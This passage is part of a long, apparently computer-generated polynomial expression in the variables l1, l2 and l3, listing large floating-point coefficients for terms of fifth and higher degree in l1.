4.79030008130949e+20*l1**6*l2**2*l3**7 - 8.69901210994849e+18*l1**6*l2**2*l3**6 - 1.51880250587069e+18*l1**6*l2**2*l3**5 + 1.21769385582496e+16*l1**6*l2**2*l3**4 + 1.82608721188272e+15*l1**6*l2**2*l3**3 - 5219441330450.81*l1**6*l2**2*l3**2 - 432664215550.535*l1**6*l2**2*l3 + 138035375.397214*l1**6*l2**2 + 6.19674003399356e+31*l1**6*l2*l3**21 + 9.37506798691287e+31*l1**6*l2*l3**20 + 6.69537235306428e+27*l1**6*l2*l3**19 - 6.16921318573123e+30*l1**6*l2*l3**18 - 6.60011373426194e+28*l1**6*l2*l3**17 + 1.40839115242606e+29*l1**6*l2*l3**16 + 1.64982193925232e+27*l1**6*l2*l3**15 - 1.57971936104468e+27*l1**6*l2*l3**14 - 1.33667535283562e+25*l1**6*l2*l3**13 + 1.2247426880231e+25*l1**6*l2*l3**12 + 5.23875635068205e+21*l1**6*l2*l3**11 - 6.90967627202699e+22*l1**6*l2*l3**10 + 5.64878066407306e+20*l1**6*l2*l3**9 + 3.05142532375307e+20*l1**6*l2*l3**8 - 3.29653227892239e+18*l1**6*l2*l3**7 - 8.58582277984e+17*l1**6*l2*l3**6 + 7.19711199650386e+15*l1**6*l2*l3**5 + 1.15553142919054e+15*l1**6*l2*l3**4 - 4425842063832.53*l1**6*l2*l3**3 - 432664215550.523*l1**6*l2*l3**2 - 92023583.5980566*l1**6*l2*l3 - 69017687.6985886*l1**6*l2 - 1.91363974168048e+31*l1**6*l3**22 - 1.65412979939667e+31*l1**6*l3**21 + 2.39309016225985e+29*l1**6*l3**20 + 1.16039925169264e+30*l1**6*l3**19 + 1.69577076917186e+28*l1**6*l3**18 - 2.8806034878944e+28*l1**6*l3**17 - 9.50893728871083e+26*l1**6*l3**16 + 2.84128047815938e+26*l1**6*l3**15 + 1.63389456368886e+25*l1**6*l3**14 - 1.2489211550467e+24*l1**6*l3**13 - 1.60192998700639e+23*l1**6*l3**12 - 5.04204277696327e+21*l1**6*l3**11 + 8.99078569097963e+20*l1**6*l3**10 + 7.46055475190992e+19*l1**6*l3**9 - 2.7732150279021e+18*l1**6*l3**8 - 3.02453171927743e+17*l1**6*l3**7 + 4.36648507914388e+15*l1**6*l3**6 + 590308188211613.0*l1**6*l3**5 - 2365536275496.72*l1**6*l3**4 - 336516612094.841*l1**6*l3**3 - 46011791.7989923*l1**6*l3**2 - 27607075.0794247*l1**6*l3 - 485280.616630749*l1**6 - 3.6697865792712e+31*l1**5*l2**23 + 1.69420972434772e+32*l1**5*l2**22*l3 - 
2.21678834280584e+31*l1**5*l2**22 - 1.80016408514402e+32*l1**5*l2**21*l3**2 + 1.29082092804882e+32*l1**5*l2**21*l3 + 3.5402630430144e+30*l1**5*l2**21 - 8.82313612366984e+31*l1**5*l2**20*l3**3 - 2.73381180290016e+32*l1**5*l2**20*l3**2 - 1.06921098973073e+31*l1**5*l2**20*l3 + 2.00587833027718e+30*l1**5*l2**20 + 1.081320030663e+33*l1**5*l2**19*l3**4 + 1.9939510270673e+32*l1**5*l2**19*l3**3 + 1.75652711290955e+31*l1**5*l2**19*l3**2 - 8.87890864579304e+30*l1**5*l2**19*l3 - 1.11529805958294e+29*l1**5*l2**19 - 9.51110753066988e+32*l1**5*l2**18*l3**5 + 9.2193998804137e+32*l1**5*l2**18*l3**4 - 9.79725047756335e+30*l1**5*l2**18*l3**3 + 2.21920064162695e+31*l1**5*l2**18*l3**2 + 2.34747887559341e+29*l1**5*l2**18*l3 - 6.19204865788638e+28*l1**5*l2**18 - 1.69544139962329e+33*l1**5*l2**17*l3**6 - 3.62374362971754e+33*l1**5*l2**17*l3**5 - 1.39768144332104e+31*l1**5*l2**17*l3**4 - 3.37282364762902e+31*l1**5*l2**17*l3**3 - 4.05214034487976e+29*l1**5*l2**17*l3**2 + 2.188009804746e+29*l1**5*l2**17*l3 + 1.5869920034207e+27*l1**5*l2**17 + 1.07535094864101e+34*l1**5*l2**16*l3**7 + 8.16522945584051e+33*l1**5*l2**16*l3**6 + 1.94676438073359e+31*l1**5*l2**16*l3**5 + 2.65886118701797e+31*l1**5*l2**16*l3**4 + 1.05824714529456e+29*l1**5*l2**16*l3**3 - 5.32884329206925e+29*l1**5*l2**16*l3**2 - 1.61552507958229e+27*l1**5*l2**16*l3 + 9.15534702634164e+26*l1**5*l2**16 - 2.39977086768059e+34*l1**5*l2**15*l3**8 - 1.28146584954589e+34*l1**5*l2**15*l3**7 + 3.57261199774041e+31*l1**5*l2**15*l3**6 + 1.11403735727595e+31*l1**5*l2**15*l3**5 + 1.95276141064335e+29*l1**5*l2**15*l3**4 + 7.7528352597932e+29*l1**5*l2**15*l3**3 + 3.20203429796388e+27*l1**5*l2**15*l3**2 - 2.34508108993465e+27*l1**5*l2**15*l3 - 1.59019049019647e+25*l1**5*l2**15 + 4.10153671792998e+34*l1**5*l2**14*l3**9 + 1.59564806532585e+34*l1**5*l2**14*l3**8 - 1.97351506403868e+32*l1**5*l2**14*l3**7 - 7.48078777442748e+31*l1**5*l2**14*l3**6 - 5.55551223022171e+29*l1**5*l2**14*l3**5 - 8.34827437397543e+29*l1**5*l2**14*l3**4 + 
3.40260211453766e+27*l1**5*l2**14*l3**3 + 5.44671778133318e+27*l1**5*l2**14*l3**2 + 2.8533701275103e+23*l1**5*l2**14*l3 - 9.17298925106496e+24*l1**5*l2**14 - 5.42160337156934e+34*l1**5*l2**13*l3**10 - 1.51802640034359e+34*l1**5*l2**13*l3**9 + 4.13542444844677e+32*l1**5*l2**13*l3**8 + 1.30961931849196e+32*l1**5*l2**13*l3**7 - 2.31235353349236e+29*l1**5*l2**13*l3**6 + 4.616928017652e+29*l1**5*l2**13*l3**5 - 2.80887479744172e+27*l1**5*l2**13*l3**4 - 6.14594996665118e+27*l1**5*l2**13*l3**3 - 2.36298788344061e+25*l1**5*l2**13*l3**2 + 1.47910306615748e+25*l1**5*l2**13*l3 + 1.06275050695241e+23*l1**5*l2**13 + 6.37303567264885e+34*l1**5*l2**12*l3**11 + 1.09892937789132e+34*l1**5*l2**12*l3**10 - 6.4526547303366e+32*l1**5*l2**12*l3**9 - 1.51913178489319e+32*l1**5*l2**12*l3**8 + 1.50307217099668e+30*l1**5*l2**12*l3**7 + 1.39611542039713e+28*l1**5*l2**12*l3**6 + 9.12114848715759e+27*l1**5*l2**12*l3**5 + 6.82769837176299e+27*l1**5*l2**12*l3**4 - 5.67491650204607e+25*l1**5*l2**12*l3**3 - 3.71395514155325e+25*l1**5*l2**12*l3**2 + 9.96101219598344e+22*l1**5*l2**12*l3 + 5.88570161366326e+22*l1**5*l2**12 - 6.45493854497986e+34*l1**5*l2**11*l3**12 - 4.04571709348398e+33*l1**5*l2**11*l3**11 + 7.83110361006021e+32*l1**5*l2**11*l3**10 + 1.16583288015746e+32*l1**5*l2**11*l3**9 - 3.50815529021622e+30*l1**5*l2**11*l3**8 - 4.62467056049046e+29*l1**5*l2**11*l3**7 + 3.78522797853433e+27*l1**5*l2**11*l3**6 - 2.70614976691524e+27*l1**5*l2**11*l3**5 - 6.22804230651291e+24*l1**5*l2**11*l3**4 + 2.511284889338e+25*l1**5*l2**11*l3**3 + 1.93734096416785e+23*l1**5*l2**11*l3**2 - 3.63001618184105e+22*l1**5*l2**11*l3 - 5.70598480839827e+20*l1**5*l2**11 + 6.03871761049229e+34*l1**5*l2**10*l3**13 - 2.48981516406165e+33*l1**5*l2**10*l3**12 - 8.29749954890612e+32*l1**5*l2**10*l3**11 - 4.85211360182535e+31*l1**5*l2**10*l3**10 + 4.6608009923518e+30*l1**5*l2**10*l3**9 + 4.61235173723586e+29*l1**5*l2**10*l3**8 - 4.86377567802644e+27*l1**5*l2**10*l3**7 + 1.70763048691608e+27*l1**5*l2**10*l3**6 - 
8.88287412071303e+25*l1**5*l2**10*l3**5 - 3.91008371841435e+25*l1**5*l2**10*l3**4 + 4.60728709610527e+23*l1**5*l2**10*l3**3 + 1.62725798457502e+23*l1**5*l2**10*l3**2 - 8.31442317908615e+20*l1**5*l2**10*l3 - 2.74433531521608e+20*l1**5*l2**10 - 4.91147174038381e+34*l1**5*l2**9*l3**14 + 7.2464378115261e+33*l1**5*l2**9*l3**13 + 7.40896468598461e+32*l1**5*l2**9*l3**12 - 2.69342713128952e+31*l1**5*l2**9*l3**11 - 5.22008426007105e+30*l1**5*l2**9*l3**10 - 2.50145818948194e+29*l1**5*l2**9*l3**9 + 2.12953122245277e+28*l1**5*l2**9*l3**8 + 1.67260391841973e+27*l1**5*l2**9*l3**7 - 6.23653938257214e+25*l1**5*l2**9*l3**6 + 1.04956236790855e+24*l1**5*l2**9*l3**5 + 3.44758980274481e+23*l1**5*l2**9*l3**4 + 5.92688643026602e+21*l1**5*l2**9*l3**3 - 1.45150465409969e+21*l1**5*l2**9*l3**2 - 5.56178617306806e+19*l1**5*l2**9*l3 + 2.21966850628888e+18*l1**5*l2**9 + 3.59392598277978e+34*l1**5*l2**8*l3**15 - 8.57361461356468e+33*l1**5*l2**8*l3**14 - 5.82043700933333e+32*l1**5*l2**8*l3**13 + 7.03536191661397e+31*l1**5*l2**8*l3**12 + 4.35127140039523e+30*l1**5*l2**8*l3**11 - 1.19901180577507e+29*l1**5*l2**8*l3**10 - 1.50741311819191e+28*l1**5*l2**8*l3**9 + 4.65749313948516e+26*l1**5*l2**8*l3**8 - 4.03223139393436e+25*l1**5*l2**8*l3**7 - 2.01606064136538e+25*l1**5*l2**8*l3**6 + 6.08322248060021e+23*l1**5*l2**8*l3**5 + 1.65369516102014e+23*l1**5*l2**8*l3**4 - 2.44483634322438e+21*l1**5*l2**8*l3**3 - 5.9928272926073e+20*l1**5*l2**8*l3**2 + 3.54597450869932e+18*l1**5*l2**8*l3 + 8.90797579951053e+17*l1**5*l2**8 - 2.17688812129663e+34*l1**5*l2**7*l3**16 + 7.4372874098311e+33*l1**5*l2**7*l3**15 + 3.72056961062164e+32*l1**5*l2**7*l3**14 - 7.65073462566724e+31*l1**5*l2**7*l3**13 - 3.06788531138466e+30*l1**5*l2**7*l3**12 + 2.28771322199187e+29*l1**5*l2**7*l3**11 + 1.87054005183349e+28*l1**5*l2**7*l3**10 + 7.25907333302174e+26*l1**5*l2**7*l3**9 - 9.91298732504876e+25*l1**5*l2**7*l3**8 - 1.33431993407786e+25*l1**5*l2**7*l3**7 + 5.95433057949207e+23*l1**5*l2**7*l3**6 + 
1.00198644749821e+23*l1**5*l2**7*l3**5 - 2.6767165725586e+21*l1**5*l2**7*l3**4 - 4.12762056633081e+20*l1**5*l2**7*l3**3 + 5.82672861086844e+18*l1**5*l2**7*l3**2 + 5.13214053012778e+17*l1**5*l2**7*l3 - 3.97282779664556e+15*l1**5*l2**7 + 1.1328207150853e+34*l1**5*l2**6*l3**17 - 4.76816657446326e+33*l1**5*l2**6*l3**16 - 1.95349655421926e+32*l1**5*l2**6*l3**15 + 5.03354484551013e+31*l1**5*l2**6*l3**14 + 1.37993460352166e+30*l1**5*l2**6*l3**13 - 1.61765442293761e+29*l1**5*l2**6*l3**12 - 3.79439135307102e+27*l1**5*l2**6*l3**11 + 8.13441573699058e+26*l1**5*l2**6*l3**10 - 4.066469537948e+25*l1**5*l2**6*l3**9 - 1.23666914864877e+25*l1**5*l2**6*l3**8 + 5.43081009244794e+23*l1**5*l2**6*l3**7 + 1.30388181821312e+23*l1**5*l2**6*l3**6 - 3.09242047756326e+21*l1**5*l2**6*l3**5 - 6.6993868198567e+20*l1**5*l2**6*l3**4 + 8.26355166876956e+18*l1**5*l2**6*l3**3 + 1.67133966699862e+18*l1**5*l2**6*l3**2 - 6.98297529949214e+15*l1**5*l2**6*l3 - 1.21433303841795e+15*l1**5*l2**6 - 4.5437207614847e+33*l1**5*l2**5*l3**18 + 2.32662601421482e+33*l1**5*l2**5*l3**17 + 7.34066720668044e+31*l1**5*l2**5*l3**16 - 1.82780537656266e+31*l1**5*l2**5*l3**15 - 3.43674055981306e+29*l1**5*l2**5*l3**14 - 9.03026999331189e+28*l1**5*l2**5*l3**13 + 1.29665370088835e+27*l1**5*l2**5*l3**12 + 1.48301906996721e+27*l1**5*l2**5*l3**11 - 2.76404450313692e+25*l1**5*l2**5*l3**10 - 1.45339175487752e+25*l1**5*l2**5*l3**9 + 4.33961587846006e+23*l1**5*l2**5*l3**8 + 1.08842394135102e+23*l1**5*l2**5*l3**7 - 2.85787082396721e+21*l1**5*l2**5*l3**6 - 5.79508126470154e+20*l1**5*l2**5*l3**5 + 8.66147372642436e+18*l1**5*l2**5*l3**4 + 1.43503283937867e+18*l1**5*l2**5*l3**3 - 1.0144082595209e+16*l1**5*l2**5*l3**2 - 1.02286339287386e+15*l1**5*l2**5*l3 + 2472366946003.0*l1**5*l2**5 + 1.58855318667134e+33*l1**5*l2**4*l3**19 - 7.11000958335831e+32*l1**5*l2**4*l3**18 - 1.96121741677353e+31*l1**5*l2**4*l3**17 - 3.80453078942707e+30*l1**5*l2**4*l3**16 - 2.15294502317014e+29*l1**5*l2**4*l3**15 + 2.37978072628888e+29*l1**5*l2**4*l3**14 + 
6.73777245757971e+27*l1**5*l2**4*l3**13 - 1.61552715890726e+27*l1**5*l2**4*l3**12 - 7.67626501267645e+25*l1**5*l2**4*l3**11 + 1.04686655128701e+24*l1**5*l2**4*l3**10 + 5.40048563880501e+23*l1**5*l2**4*l3**9 + 7.26918059377706e+22*l1**5*l2**4*l3**8 - 2.74794491161365e+21*l1**5*l2**4*l3**7 - 5.28965949221355e+20*l1**5*l2**4*l3**6 + 8.70241250393277e+18*l1**5*l2**4*l3**5 + 1.64226428768765e+18*l1**5*l2**4*l3**4 - 1.2588915681055e+16*l1**5*l2**4*l3**3 - 1.94009994168601e+15*l1**5*l2**4*l3**2 + 4441103588190.66*l1**5*l2**4*l3 + 391458099783.806*l1**5*l2**4 - 4.34549171201018e+32*l1**5*l2**3*l3**20 + 6.92635619928621e+31*l1**5*l2**3*l3**19 + 3.2519735488291e+30*l1**5*l2**3*l3**18 + 9.92046196605888e+30*l1**5*l2**3*l3**17 + 1.86819460445773e+29*l1**5*l2**3*l3**16 - 2.66498697946481e+29*l1**5*l2**3*l3**15 - 3.91248483756877e+27*l1**5*l2**3*l3**14 + 2.565024282848e+27*l1**5*l2**3*l3**13 + 2.60401710885214e+25*l1**5*l2**3*l3**12 - 1.67913367699929e+25*l1**5*l2**3*l3**11 + 3.33844282667301e+22*l1**5*l2**3*l3**10 + 8.42108313319592e+22*l1**5*l2**3*l3**9 - 1.27457558369828e+21*l1**5*l2**3*l3**8 - 4.0215183444144e+20*l1**5*l2**3*l3**7 + 6.21428032861923e+18*l1**5*l2**3*l3**6 + 1.27643328069732e+18*l1**5*l2**3*l3**5 - 1.16057150117421e+16*l1**5*l2**3*l3**4 - 1.6921346323744e+15*l1**5*l2**3*l3**3 + 5906209926562.57*l1**5*l2**3*l3**2 + 453267273433.878*l1**5*l2**3*l3 - 92023583.5981671*l1**5*l2**3 + 1.51309288464449e+32*l1**5*l2**2*l3**21 + 6.66399422204071e+31*l1**5*l2**2*l3**20 - 1.47059901299735e+30*l1**5*l2**2*l3**19 - 6.96911779427903e+30*l1**5*l2**2*l3**18 - 9.80388234682895e+28*l1**5*l2**2*l3**17 + 1.65843566498847e+29*l1**5*l2**2*l3**16 + 3.39641196413002e+27*l1**5*l2**2*l3**15 - 1.54592869921801e+27*l1**5*l2**2*l3**14 - 4.57042225096319e+25*l1**5*l2**2*l3**13 + 7.16581700046432e+24*l1**5*l2**2*l3**12 + 3.60844951025083e+23*l1**5*l2**2*l3**11 + 5.74753979331179e+21*l1**5*l2**2*l3**10 - 1.80994851236658e+21*l1**5*l2**2*l3**9 - 2.08465568182671e+20*l1**5*l2**2*l3**8 + 
5.63168630152097e+18*l1**5*l2**2*l3**7 + 8.80585865522031e+17*l1**5*l2**2*l3**6 - 9.60893705424529e+15*l1**5*l2**2*l3**5 - 1.47002984354327e+15*l1**5*l2**2*l3**4 + 5906209926562.81*l1**5*l2**2*l3**3 + 618091736500.764*l1**5*l2**2*l3**2 + 552141501.588562*l1**5*l2**2*l3 + 165642450.476587*l1**5*l2**2 - 4.06957625888369e+31*l1**5*l2*l3**22 - 3.31325696978851e+31*l1**5*l2*l3**21 + 1.03897260017181e+30*l1**5*l2*l3**20 + 2.68176393173397e+30*l1**5*l2*l3**19 + 7.25694066616602e+27*l1**5*l2*l3**18 - 6.9218930850196e+28*l1**5*l2*l3**17 - 6.94063234827424e+26*l1**5*l2*l3**16 + 8.38011570980274e+26*l1**5*l2*l3**15 + 9.04107284934129e+24*l1**5*l2*l3**14 - 6.75509194479341e+24*l1**5*l2*l3**13 - 4.24023499757339e+22*l1**5*l2*l3**12 + 3.66441360668178e+22*l1**5*l2*l3**11 - 8.16722527700673e+19*l1**5*l2*l3**10 - 1.57102673098499e+20*l1**5*l2*l3**9 + 1.46808738819964e+18*l1**5*l2*l3**8 + 4.84331705265705e+17*l1**5*l2*l3**7 - 4.88149495354582e+15*l1**5*l2*l3**6 - 798625777611347.0*l1**5*l2*l3**5 + 4441103588190.56*l1**5*l2*l3**4 + 453267273433.894*l1**5*l2*l3**3 - 7.6171875e-5*l1**5*l2*l3**2 + 82821225.2382988*l1**5*l2*l3 + 1455841.84989226*l1**5*l2 + 8.50562639074549e+30*l1**5*l3**23 + 6.01728898462207e+30*l1**5*l3**22 - 2.70930786261476e+29*l1**5*l3**21 - 4.8220797209449e+29*l1**5*l3**20 - 1.01858604835534e+27*l1**5*l3**19 + 1.34475077846589e+28*l1**5*l3**18 + 3.14113764741508e+26*l1**5*l3**17 - 1.58923741117244e+26*l1**5*l3**16 - 6.68597933756633e+24*l1**5*l3**15 + 1.01775849107669e+24*l1**5*l3**14 + 7.69237921588966e+22*l1**5*l3**13 - 5.32656617086528e+20*l1**5*l3**12 - 5.00589657863191e+20*l1**5*l3**11 - 2.90530612016093e+19*l1**5*l3**10 + 1.80887320938484e+18*l1**5*l3**9 + 1.66298415787594e+17*l1**5*l3**8 - 3.48077735251492e+15*l1**5*l3**7 - 457203891943047.0*l1**5*l3**6 + 2472366946003.03*l1**5*l3**5 + 391458099783.802*l1**5*l3**4 + 184047167.196169*l1**5*l3**3 + 41410612.6191407*l1**5*l3**2 - 727920.924946051*l1**5*l3 - 327564.416225743*l1**5 + 
1.13475656536474e+31*l1**4*l2**24 - 4.72226319794803e+31*l1**4*l2**23*l3 + 6.24444221167462e+30*l1**4*l2**23 + 1.02319909163453e+31*l1**4*l2**22*l3**2 - 3.27827537282242e+31*l1**4*l2**22*l3 - 1.18036147003255e+30*l1**4*l2**22 + 3.0922621191138e+32*l1**4*l2**21*l3**3 + 3.79050589982595e+31*l1**4*l2**21*l3**2 + 4.15257084810266e+30*l1**4*l2**21*l3 - 6.17109941631215e+29*l1**4*l2**21 - 1.19598193182963e+33*l1**4*l2**20*l3**4 + 1.90299887495543e+32*l1**4*l2**20*l3**3 - 7.10532875224425e+30*l1**4*l2**20*l3**2 + 2.9299171228696e+30*l1**4*l2**20*l3 + 4.0467825532255e+28*l1**4*l2**20 + 2.1016166088407e+33*l1**4*l2**19*l3**5 - 1.20074331586113e+33*l1**4*l2**19*l3**4 + 2.31140732377269e+30*l1**4*l2**19*l3**3 - 7.10189961421341e+30*l1**4*l2**19*l3**2 - 1.13588337579282e+29*l1**4*l2**19*l3 + 2.07178714911524e+28*l1**4*l2**19 - 1.81709962018315e+33*l1**4*l2**18*l3**6 + 3.64088461223092e+33*l1**4*l2**18*l3**5 + 1.45874119694271e+31*l1**4*l2**18*l3**4 + 7.99202019623584e+30*l1**4*l2**18*l3**3 + 2.12095736646235e+29*l1**4*l2**18*l3**2 - 8.40371254375774e+28*l1**4*l2**18*l3 - 6.24577669323256e+26*l1**4*l2**18 - 1.64296900417415e+33*l1**4*l2**17*l3**7 - 7.90286747859483e+33*l1**4*l2**17*l3**6 - 3.02762623736583e+31*l1**4*l2**17*l3**5 + 6.19620471230146e+30*l1**4*l2**17*l3**4 - 1.32036189615904e+29*l1**4*l2**17*l3**3 + 2.09331677751695e+29*l1**4*l2**17*l3**2 + 1.10784450644757e+27*l1**4*l2**17*l3 - 3.29939028640129e+26*l1**4*l2**17 + 7.90400854497206e+33*l1**4*l2**16*l3**8 + 1.33603714081299e+34*l1**4*l2**16*l3**7 + 1.66089203392466e+31*l1**4*l2**16*l3**6 - 4.76557078920048e+31*l1**4*l2**16*l3**5 - 6.7914240485447e+28*l1**4*l2**16*l3**4 - 2.98072291914732e+29*l1**4*l2**16*l3**3 - 1.940232360144e+27*l1**4*l2**16*l3**2 + 1.03128997371138e+27*l1**4*l2**16*l3 + 6.79778581764484e+24*l1**4*l2**16 - 1.45799409310567e+34*l1**4*l2**15*l3**9 - 1.87115812565981e+34*l1**4*l2**15*l3**8 + 4.87068993055256e+31*l1**4*l2**15*l3**7 + 1.17798243068047e+32*l1**4*l2**15*l3**6 + 
3.19629108735464e+29*l1**4*l2**15*l3**5 + 2.23184760184777e+29*l1**4*l2**15*l3**4 - 2.9463360884832e+26*l1**4*l2**15*l3**3 - 2.38761706485444e+27*l1**4*l2**15*l3**2 - 5.38492986504867e+24*l1**4*l2**15*l3 + 3.58051780611677e+24*l1**4*l2**15 + 1.62430659982447e+34*l1**4*l2**14*l3**10 + 2.23212572869642e+34*l1**4*l2**14*l3**9 - 1.33806251516792e+32*l1**4*l2**14*l3**8 - 1.98990608185618e+32*l1**4*l2**14*l3**7 - 1.52476578383282e+29*l1**4*l2**14*l3**6 + 1.6527315684321e+29*l1**4*l2**14*l3**5 + 1.6186606489817e+27*l1**4*l2**14*l3**4 + 2.86022235538354e+27*l1**4*l2**14*l3**3 + 1.35308953345647e+25*l1**4*l2**14*l3**2 - 7.8428208364268e+24*l1**4*l2**14*l3 - 4.89866059545675e+22*l1**4*l2**14 - 1.03685100058034e+34*l1**4*l2**13*l3**11 - 2.3659628200032e+34*l1**4*l2**13*l3**10 + 1.7571751960803e+32*l1**4*l2**13*l3**9 + 2.66382356919084e+32*l1**4*l2**13*l3**8 - 2.63575274115881e+29*l1**4*l2**13*l3**7 - 7.70381367438492e+29*l1**4*l2**13*l3**6 - 4.8278294004116e+27*l1**4*l2**13*l3**5 - 2.32834078552842e+27*l1**4*l2**13*l3**4 + 1.60659958317094e+25*l1**4*l2**13*l3**3 + 1.79221692010506e+25*l1**4*l2**13*l3**2 - 1.10697889670512e+22*l1**4*l2**13*l3 - 2.48260528282187e+22*l1**4*l2**13 - 2.56273765975738e+33*l1**4*l2**12*l3**12 + 2.29662452459863e+34*l1**4*l2**12*l3**11 - 1.06052242492239e+32*l1**4*l2**12*l3**10 - 3.00378305277945e+32*l1**4*l2**12*l3**9 + 6.72836380908299e+29*l1**4*l2**12*l3**8 + 1.42073600081151e+30*l1**4*l2**12*l3**7 + 1.99932626227257e+27*l1**4*l2**12*l3**6 - 7.74012329389104e+26*l1**4*l2**12*l3**5 - 7.55049825303244e+24*l1**4*l2**12*l3**4 - 1.57634808453316e+25*l1**4*l2**12*l3**3 - 8.22263230014828e+22*l1**4*l2**12*l3**2 + 2.84536060836805e+22*l1**4*l2**12*l3 + 2.879794387934e+20*l1**4*l2**12 + 1.62791985048945e+34*l1**4*l2**11*l3**13 - 2.1280529790368e+34*l1**4*l2**11*l3**12 - 5.71372193592878e+31*l1**4*l2**11*l3**11 + 3.02162322325661e+32*l1**4*l2**11*l3**10 - 3.1263045122918e+29*l1**4*l2**11*l3**9 - 1.84206209118661e+30*l1**4*l2**11*l3**8 - 
2.5091036109052e+27*l1**4*l2**11*l3**7 + 3.80314946454092e+27*l1**4*l2**11*l3**6 + 4.55484133394837e+25*l1**4*l2**11*l3**5 + 1.58993814192697e+25*l1**4*l2**11*l3**4 - 1.7169871747995e+23*l1**4*l2**11*l3**3 - 7.99712319560571e+22*l1**4*l2**11*l3**2 + 2.47386409607131e+20*l1**4*l2**11*l3 + 1.27522090639318e+20*l1**4*l2**11 - 2.53270648878618e+34*l1**4*l2**10*l3**14 + 1.89642233472582e+34*l1**4*l2**10*l3**13 + 2.42489787562001e+32*l1**4*l2**10*l3**12 - 2.80107260499182e+32*l1**4*l2**10*l3**11 - 6.56395360236039e+29*l1**4*l2**10*l3**10 + 1.99516745938164e+30*l1**4*l2**10*l3**9 + 4.93115770364651e+26*l1**4*l2**10*l3**8 - 7.19611379207578e+27*l1**4*l2**10*l3**7 - 4.90125338116671e+24*l1**4*l2**10*l3**6 + 4.12219806175012e+24*l1**4*l2**10*l3**5 - 6.70424365937859e+22*l1**4*l2**10*l3**4 + 2.2018186409706e+22*l1**4*l2**10*l3**3 + 6.16062743850779e+20*l1**4*l2**10*l3**2 - 3.05753394244604e+19*l1**4*l2**10*l3 - 1.29406428414196e+18*l1**4*l2**10 + 2.60856658049265e+34*l1**4*l2**9*l3**15 - 1.61338873235866e+34*l1**4*l2**9*l3**14 - 3.46031642390848e+32*l1**4*l2**9*l3**13 + 2.44645330129692e+32*l1**4*l2**9*l3**12 + 1.836097991212e+30*l1**4*l2**9*l3**11 - 1.87009454990754e+30*l1**4*l2**9*l3**10 - 6.48992076508176e+27*l1**4*l2**9*l3**9 + 7.94976479108238e+27*l1**4*l2**9*l3**8 + 4.41723428871749e+25*l1**4*l2**9*l3**7 - 7.74496540950729e+24*l1**4*l2**9*l3**6 - 2.93946205836373e+23*l1**4*l2**9*l3**5 - 6.24540740620978e+22*l1**4*l2**9*l3**4 + 1.01434605832802e+21*l1**4*l2**9*l3**3 + 2.91921351449001e+20*l1**4*l2**9*l3**2 - 1.39157905549679e+18*l1**4*l2**9*l3 - 4.85081904820804e+17*l1**4*l2**9 - 2.06799540731218e+34*l1**4*l2**8*l3**16 + 1.25382039320068e+34*l1**4*l2**8*l3**15 + 3.3678407842716e+32*l1**4*l2**8*l3**14 - 1.96428928230609e+32*l1**4*l2**8*l3**13 - 2.30978219043956e+30*l1**4*l2**8*l3**12 + 1.5845778956414e+30*l1**4*l2**8*l3**11 + 7.90565133957132e+27*l1**4*l2**8*l3**10 - 8.20851440994266e+27*l1**4*l2**8*l3**9 - 4.1939013510016e+24*l1**4*l2**8*l3**8 + 
2.43582458219762e+25*l1**4*l2**8*l3**7 - 1.24851656617946e+23*l1**4*l2**8*l3**6 - 5.29521827902374e+22*l1**4*l2**8*l3**5 + 9.78834288493899e+20*l1**4*l2**8*l3**4 + 1.23040494420873e+20*l1**4*l2**8*l3**3 - 2.89699970990621e+18*l1**4*l2**8*l3**2 - 8.8250756368037e+16*l1**4*l2**8*l3 + 2.69509395347583e+15*l1**4*l2**8 + 1.27644515748609e+34*l1**4*l2**7*l3**17 - 8.59325428157564e+33*l1**4*l2**7*l3**16 - 2.41606427034945e+32*l1**4*l2**7*l3**15 + 1.39569154080588e+32*l1**4*l2**7*l3**14 + 2.0107415200284e+30*l1**4*l2**7*l3**13 - 1.1517066480106e+30*l1**4*l2**7*l3**12 - 1.04921055363235e+28*l1**4*l2**7*l3**11 + 6.20385786130304e+27*l1**4*l2**7*l3**10 + 4.69343261667244e+25*l1**4*l2**7*l3**9 - 1.60187462339896e+25*l1**4*l2**7*l3**8 - 2.94903586436417e+23*l1**4*l2**7*l3**7 - 1.2895960237868e+22*l1**4*l2**7*l3**6 + 1.47041048690118e+21*l1**4*l2**7*l3**5 + 2.69871581949608e+20*l1**4*l2**7*l3**4 - 4.05261980738601e+18*l1**4*l2**7*l3**3 - 9.30032107059811e+17*l1**4*l2**7*l3**2 + 3.68595802511785e+15*l1**4*l2**7*l3 + 807385600454523.0*l1**4*l2**7 - 6.28075139305657e+33*l1**4*l2**6*l3**18 + 4.94080075549093e+33*l1**4*l2**6*l3**17 + 1.32620098012706e+32*l1**4*l2**6*l3**16 - 8.19107547226416e+31*l1**4*l2**6*l3**15 - 1.17326777967695e+30*l1**4*l2**6*l3**14 + 6.82367211349459e+29*l1**4*l2**6*l3**13 + 5.30269367220986e+27*l1**4*l2**6*l3**12 - 4.31765571796513e+27*l1**4*l2**6*l3**11 + 3.64592044912004e+23*l1**4*l2**6*l3**10 + 1.93294090078183e+25*l1**4*l2**6*l3**9 - 1.48250372103452e+23*l1**4*l2**6*l3**8 - 8.0238455348783e+22*l1**4*l2**6*l3**7 + 1.18611423798047e+21*l1**4*l2**6*l3**6 + 2.92118467256218e+20*l1**4*l2**6*l3**5 - 4.26317358168895e+18*l1**4*l2**6*l3**4 - 6.15491195191495e+17*l1**4*l2**6*l3**3 + 5.95647179051194e+15*l1**4*l2**6*l3**2 + 419965988908202.0*l1**4*l2**6*l3 - 1907690544755.49*l1**4*l2**6 + 2.37447306517622e+33*l1**4*l2**5*l3**19 - 2.2932185891122e+33*l1**4*l2**5*l3**18 - 5.41116342897215e+31*l1**4*l2**5*l3**17 + 3.64284248227489e+31*l1**4*l2**5*l3**16 + 
